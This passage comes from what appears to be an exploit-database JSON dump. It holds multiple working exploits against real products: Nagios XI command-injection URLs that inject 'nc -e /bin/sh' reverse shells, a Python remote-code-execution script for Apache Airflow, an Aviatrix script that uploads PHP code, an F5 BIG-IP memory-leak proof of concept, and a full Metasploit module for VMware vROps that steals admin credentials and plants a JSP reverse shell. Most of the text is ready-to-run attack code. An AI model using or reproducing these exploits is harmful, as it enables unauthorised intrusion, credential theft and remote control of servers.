$absolute_mrtg_cfg_file;\r\n // add some meta info to the file\r\n $infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". get_datetime_string(time()) .\") ####\\n\";\r\n exec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\");\r\n\r\n return true;\r\n}\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n```\r\nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2=\r\n```\r\n\r\nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25298\r\n\r\n### Code path\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php`\r\n\r\n### Code Snippet\r\n\r\n```php\r\ncase CONFIGWIZARD_MODE_GETSTAGE2HTML:\r\n\r\n // echo (\"reached here ============================\");\r\n // Get variables that were passed to us\r\n $address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input]\r\n $port = grab_array_var($inargs, \"port\", \"\");\r\n $token = grab_array_var($inargs, \"token\", \"\");\r\n $no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1);\r\n $hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address));\r\n $default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi');\r\n $tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693');\r\n $rp_address = nagiosccm_replace_user_macros($address);\r\n $rp_port = nagiosccm_replace_user_macros($port);\r\n $rp_token = nagiosccm_replace_user_macros($token);\r\n $services_serial = grab_array_var($inargs, \"services_serial\", \"\");\r\n if ($services_serial) {\r\n $services = unserialize(base64_decode($services_serial));\r\n }\r\n // echo $rp_address;\r\n $not_used = array();\r\n $return_code = 0;\r\n $alternative_host_check = false;\r\n exec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here]\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n```\r\nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2=\r\n```\r\n\r\nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25299\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/admin/sshterm.php`\r\n\r\n### Code Snippet\r\n\r\n```php+HTML\r\n<?php if ($efe) { ?>\r\n <iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe>\r\n <?php } else { ?>\r\n <div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div>\r\n<?php\r\n}\r\n```\r\n\r\n### POC\r\n\r\n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)`\r\n\r\nThe `url` variable is not sanitized and can give `xss` .\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-04T15:54:24", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-02T00:00:00", "type": "zdt", "title": "Apache Airflow 1.10.10 - (Example Dag) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2021-06-02T00:00:00", "id": "1337DAY-ID-36329", "href": "https://0day.today/exploit/description/36329", "sourceData": "# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution \n# Exploit Author: Pepe Berba\n# Vendor Homepage: https://airflow.apache.org/\n# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html\n# Version: <= 1.10.10\n# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)\n# CVE : CVE-2020-11978\n# \n# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow\n# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.\n# Together, potentially allows unauthenticated RCE to Airflow \n# \n# Repo: https://github.com/pberba/CVE-2020-11978\n# More information can be found here: \n# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E\n# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E\n#\n# Remediation:\n# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.\n# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.\n#\n# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 \"touch test\"\n\nimport argparse\nimport requests\nimport sys\nimport time\n\ndef create_dag(url, cmd):\n\tprint('[+] Checking if Airflow Experimental REST API is accessible...')\n\tcheck = requests.get('{}/api/experimental/test'.format(url))\n\n\tif check.status_code == 200:\n\t\tprint('[+] /api/experimental/test returned 200' )\n\telse:\n\t\tprint('[!] /api/experimental/test returned {}'.format(check.status_code))\n\t\tprint('[!] Airflow Experimental REST API not be accessible')\n\t\tsys.exit(1)\n\n\tcheck_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))\n\tif check_task.status_code != 200:\n\t\tprint('[!] Failed to find the example_trigger_target_dag.bash_task')\n\t\tprint('[!] Host isn\\'t vunerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\telif 'dag_run' in check_task.json()['env']:\n\t\tprint('[!] example_trigger_target_dag.bash_task is patched')\n\t\tprint('[!] Host isn\\'t vunerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\tprint('[+] example_trigger_target_dag.bash_task is vulnerable')\n\n\tunpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))\n\tif unpause.status_code != 200:\n\t\tprint('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')\n\t\tsys.exit(1)\n\telse:\n\t\tprint('[+] example_trigger_target_dag was enabled')\n\n\tprint('[+] Creating new DAG...')\n\tres = requests.post(\n\t '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),\n\t json={\n\t 'conf': {\n\t 'message': '\"; {} #'.format(cmd)\n\t }\n\t }\n\t)\n\n\tif res.status_code == 200:\n\t\tprint('[+] Successfully created DAG')\n\t\tprint('[+] \"{}\"'.format(res.json()['message']))\n\telse:\n\t\tprint('[!] Failed to create DAG')\n\t\tsys.exit(1)\n\n\twait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(\n\t\turl = url,\n\t\texecution_date=res.json()['execution_date']\n\t)\n\n\tstart_time = time.time()\n\tprint('[.] Waiting for the scheduler to run the DAG... This might take a minute.')\n\tprint('[.] If the bash task is never queued, then the scheduler might not be running.')\n\twhile True:\n\t\ttime.sleep(10)\n\t\tres = requests.get(wait_url)\n\t\tstatus = res.json()['state']\n\t\tif status == 'queued':\n\t\t\tprint('[.] Bash task queued...')\n\t\telif status == 'running':\n\t\t\tprint('[+] Bash task running...')\n\t\telif status == 'success':\n\t\t\tprint('[+] Bash task successfully ran')\n\t\t\tbreak\n\t\telif status == 'None':\n\t\t\tprint('[-] Bash task is not yet queued...'.format(status))\n\t\telse:\n\t\t\tprint('[!] Bash task was {}'.format(status))\n\t\t\tsys.exit(1)\n\n\treturn 0\n\n\ndef main():\n\targ_parser = argparse.ArgumentParser()\n\targ_parser.add_argument('url', type=str, help=\"Base URL for Airflow\")\n\targ_parser.add_argument('command', type=str)\n\targs = arg_parser.parse_args()\n\n\tcreate_dag(\n\t\targs.url, \n\t\targs.command\n\t)\n\nif __name__ == '__main__':\n\tmain()\n", "sourceHref": "https://0day.today/exploit/36329", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-20T06:08:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T00:00:00", "type": "zdt", "title": "Aviatrix Controller 6.x Path Traversal / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-12T00:00:00", "id": "1337DAY-ID-36888", "href": "https://0day.today/exploit/description/36888", "sourceData": "#!/usr/bin/env python3\nimport requests\nfrom requests.structures import CaseInsensitiveDict\nfrom colorama import Fore, Style\nimport argparse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nprint(f\"\"\"\n\n\u2591\u2588\u2580\u2580\u2588 \u2591\u2588\u2500\u2500\u2591\u2588 \u2591\u2588\u2580\u2580\u2580 \u2500\u2500 \u2588\u2580\u2588 \u2588\u2580\u2580\u2588 \u2588\u2580\u2588 \u2584\u2588\u2500 \u2500\u2500 \u2500\u2588\u2580\u2588\u2500 \u2588\u2580\u2580\u2588 \u2584\u2580\u2580\u2584 \u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2588\n\u2591\u2588\u2500\u2500\u2500 \u2500\u2591\u2588\u2591\u2588\u2500 \u2591\u2588\u2580\u2580\u2580 \u2580\u2580 \u2500\u2584\u2580 \u2588\u2584\u2580\u2588 \u2500\u2584\u2580 \u2500\u2588\u2500 \u2580\u2580 \u2588\u2584\u2584\u2588\u2584 \u2588\u2584\u2580\u2588 \u2584\u2580\u2580\u2584 \u2588\u2584\u2584\u2500 \u2588\u2584\u2580\u2588\n\u2591\u2588\u2584\u2584\u2588 \u2500\u2500\u2580\u2584\u2580\u2500 \u2591\u2588\u2584\u2584\u2584 \u2500\u2500 \u2588\u2584\u2584 \u2588\u2584\u2584\u2588 \u2588\u2584\u2584 \u2584\u2588\u2584 \u2500\u2500 \u2500\u2500\u2500\u2588\u2500 \u2588\u2584\u2584\u2588 \u2580\u2584\u2584\u2580 \u2580\u2584\u2584\u2580 \u2588\u2584\u2584\u2588\n Author : 0xJoyGhosh\n Org : System00 Security\n Twitter: @0xjoyghosh\n\n\"\"\")\ntry:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--url\", help=\"Enter Target Url With scheme Ex: -u https://avaitix.target.com\", type=str)\n parser.add_argument(\"-c\", \"--code\", help=\"Enter php code Ex: -c '<?php phpinfo(); ?>' \", type=str)\n parser.add_argument(\"-n\", \"--name\", help=\"Enter php code Ex: -n 'filename' \", type=str)\n args = parser.parse_args()\n url =f\"{args.url}/v1/backend1\"\nexcept TypeError:\n print(\"Type -h To See all the options\")\nexcept():\n exit()\ndef exploit(url,path,code):\n headers = CaseInsensitiveDict()\n headers[\"Content-Type\"] = \"application/x-www-form-urlencoded\"\n data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'\n resp = requests.post(url, headers=headers, data=data,verify=False)\n stat = requests.get(f\"{args.url}/v1/{path}\",verify=False)\n if resp.status_code==200:\n if stat.status_code==200:\n print(f\"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]\")\n print(\"\")\n else:\n print(\"[ Exploit successful Creating File Failed ]\")\n pass\n else:\n print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')\n\nif args.url is not None:\n if args.code is not None:\n if args.name is not None:\n exploit(url,args.name,args.code)\n else:\n print('Type -h to see help Menu')\n else:\n print('Type -h to see help Menu')\nelse:\n print('Type -h to see help Menu')\n", "sourceHref": "https://0day.today/exploit/36888", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T06:55:38", "description": "Big IP's Traffic Management Microkernels (TMM) URI normalization incorrectly handles invalid IPv6 hostnames allowing for information disclosure and an out-of-bounds write condition.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "zdt", "title": "F5 Big IP TMM uri_normalize_host Information Disclosure / Out-Of-Bounds Write Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2021-03-12T00:00:00", "id": "1337DAY-ID-35933", "href": "https://0day.today/exploit/description/35933", "sourceData": "F5 Big IP - TMM uri_normalize_host infoleak and out-of-bounds write\r\n\r\nBig IP's Traffic Management Microkernels (TMM) URI normalization incorrectly handles invalid IPv6 hostnames:\r\n\r\nWhen uri_normalize_host is called with a hostname of the form \\u\"[abcdef]\\u\", uri_norm_inet6 is called\r\nwith the substring abcdef as an argument. Pseudo code of this function is shown below:\r\n\r\nint uri_norm_inet6(char *inbuf, int64_t inlen, char *outbuf, _DWORD *outlen) {\r\n struct in6_addr s; unsigned int ret;\r\n\r\n ret = uri_inet6_pton(inbuf, inlen, &s); if ( !ret ) {\r\n if ( inet_ntop(AF_INET6, &s, outbuf, 46u) ) *outlen = strlen(outbuf);\r\n else ret = 3;\r\n } return ret;\r\n}\r\n\r\nThe s hostname is first passed to uri_inet6_pton, which is responsible for parsing a text IPv6\r\naddress and initializing the network address structure s. If the function doesn't return an error,\r\ninet_ntop is called to turn s back into a printable (and normalized) string.\r\n\r\nThe bug is that uri_inet6_pton incorrectly handles short hostnames. When a single hex character is\r\npassed to the function, it will only initialize the first two bytes of the in6_addr structure\r\nwithout returning an error. This means inet_ntop will now happily convert uninitialized stack memory\r\ninto a printable IPv6 hostname.\r\n\r\nWhile this could already be a security vulnerability if the normalized hostname becomes visible to\r\nthe attacker, it also breaks one of the core assumptions of callers of uri_normalize: Under normal\r\ncircumstances, a normalized URL should never be longer than 3*input_length + 2 (this handles the\r\nworst case scenario of URL encoding every character in the URL + adding slashes). This means callers\r\ncan just allocate an outbuf buffer with this size and the URI normalization functions do not have to\r\nperform any length checks.\r\n\r\nHowever, due to the described bug, the size invariant does not hold anymore leading to a\r\nstraightforward out-of-bound write.\r\n\r\nTMM's URI normalization is used in a number of places. Luckily most of them do not perform\r\nnormalization on the hostname allowing them to avoid this bug.\r\n\r\nHowever, there are a couple of configurations that can expose this bug to an attacker. (This list is\r\nbased on static analysis as I don't have a test environment where I can verify all variants) iRules\r\nor BIG-IP LTM policies that use the \\\"normalize URI\\\" config option URL categorization as part of APM,\r\nSWG or PEM Risk Classification\r\n\r\nProof of Concept: \r\n\r\nFor a server configured with the following iRule: \r\nwhen HTTP_REQUEST { \r\nlog local0. \\\"normalized: [HTTP::uri -normalized]\\\" \r\nlog local0. \\\"uri: [HTTP::uri]\\\" }\r\n\r\nSend a request like this: echo -e \\\"GET h://[f] HTTP/1.1\\\\\r\n\\\\\r\n\\\" | ncat --ssl 10.154.0.3 443\r\n\r\nThis will log uninitialized memory to /var/log/ltm on the F5 host: \r\nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: normalized: h://[aa:cf01::c00:0:1100:0]/ \r\nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: uri: h://[aa]\r\n\r\nFor debug TMM's using `wrapped_umem_alloc` for heap allocations, it will also lead to a direct\r\ncrash of the TMM due to the heap buffer overflow.\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse,\r\nthe bug report will become visible to the public. The scheduled disclosure\r\ndate is 2021-03-10. Disclosure at an earlier date is also possible if\r\nagreed upon by all parties.\r\n\r\nCredit Information: \r\n\r\nFelix Wilhelm of Google Project Zero\r\n\r\nRelated CVE Numbers: CVE-2021-22991.\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35933", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:49", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2023-02-08T16:40:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-08T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-02-08T00:00:00", "id": "PACKETSTORM:170924", "href": "https://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HTTP::NagiosXi \ninclude Msf::Exploit::CmdStager \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection', \n'Description' => %q{ \nThis module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are \nOS command injection vulnerabilities in the windowswmi, switch, and cloud-vm \nconfiguration wizards that allow an authenticated user to perform remote code \nexecution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. \n \nValid credentials for a Nagios XI user are required. This module has \nbeen successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Matthew Mathur' \n], \n'References' => [ \n['CVE', '2021-25296'], \n['CVE', '2021-25297'], \n['CVE', '2021-25298'], \n['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md'] \n], \n'Platform' => %w[linux unix], 